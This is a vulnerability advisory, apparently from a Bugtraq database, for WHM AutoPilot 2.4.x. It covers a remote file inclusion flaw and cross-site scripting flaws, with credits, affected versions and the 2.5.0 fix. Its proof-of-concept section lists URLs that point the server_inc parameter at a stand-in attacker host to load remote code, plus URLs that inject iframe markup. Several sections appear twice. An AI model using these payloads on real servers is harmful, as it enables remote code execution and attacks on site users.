Benchmark Designs WHM AutoPilot Multiple Remote Vulnerabilities
BID:12119
Info
Benchmark Designs WHM AutoPilot Multiple Remote Vulnerabilities
| Bugtraq ID: | 12119 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 28 2004 12:00AM |
| Updated: | Dec 28 2004 12:00AM |
| Credit: | Discovery is credited to James Bercegay of the GulfTech Security Research Team. |
| Vulnerable: |
WHM Autopilot WHM Autopilot 2.4.7 WHM Autopilot WHM Autopilot 2.4.6 .5 WHM Autopilot WHM Autopilot 2.4.6 WHM Autopilot WHM Autopilot 2.4.5 |
| Not Vulnerable: |
WHM Autopilot WHM Autopilot 2.5 .0 |
Discussion
Benchmark Designs WHM AutoPilot Multiple Remote Vulnerabilities
WHM AutoPilot is reported prone to multiple remote vulnerabilities. These issues exist due to insufficient sanitization of user-supplied input. An attacker may exploit these vulnerabilities to execute arbitrary script code on a vulnerable server or a user's browser.
The following specific issues were identified:
The application is reported prone to a remote file include vulnerability. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.
The application is reported prone to multiple cross-site scripting vulnerabilities as well.
All versions of WHM AutoPilot are considered vulnerable to these issues.
WHM AutoPilot is reported prone to multiple remote vulnerabilities. These issues exist due to insufficient sanitization of user-supplied input. An attacker may exploit these vulnerabilities to execute arbitrary script code on a vulnerable server or a user's browser.
The following specific issues were identified:
The application is reported prone to a remote file include vulnerability. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.
The application is reported prone to multiple cross-site scripting vulnerabilities as well.
All versions of WHM AutoPilot are considered vulnerable to these issues.
Exploit / POC
Benchmark Designs WHM AutoPilot Multiple Remote Vulnerabilities
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/inc/header.php/step_one.php?server_inc=http://attacker/step_one_
tables.php
http://www.example.com/inc/step_one_tables.php?server_inc=http://attacker/js_functions.
php
http://www.example.com/inc/step_two_tables.php?server_inc=http://attacker/js_functions.
php
http://www.example.com/inc/header.php?site_title=%3C/title%3E%3Ciframe%3E
http://www.example.com/admin/themes/blue/header.php?http_images='%3E%3Ciframe%3E
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/inc/header.php/step_one.php?server_inc=http://attacker/step_one_
tables.php
http://www.example.com/inc/step_one_tables.php?server_inc=http://attacker/js_functions.
php
http://www.example.com/inc/step_two_tables.php?server_inc=http://attacker/js_functions.
php
http://www.example.com/inc/header.php?site_title=%3C/title%3E%3Ciframe%3E
http://www.example.com/admin/themes/blue/header.php?http_images='%3E%3Ciframe%3E
Solution / Fix
Benchmark Designs WHM AutoPilot Multiple Remote Vulnerabilities
Solution:
These issues have been addressed in release 2.5.0. Licensed users should contact the vendor to obtain upgrades.
Solution:
These issues have been addressed in release 2.5.0. Licensed users should contact the vendor to obtain upgrades.
References
Benchmark Designs WHM AutoPilot Multiple Remote Vulnerabilities
References:
References:
- WHM AutoPilot Homepage (WHM AutoPilot)
- Multiple WHM Autopilot Vulnerabilities ("GulfTech Security"
) - WHM AutoPilot Security Release [ Plus Upgrade Instructions ] ("GulfTech Security"
)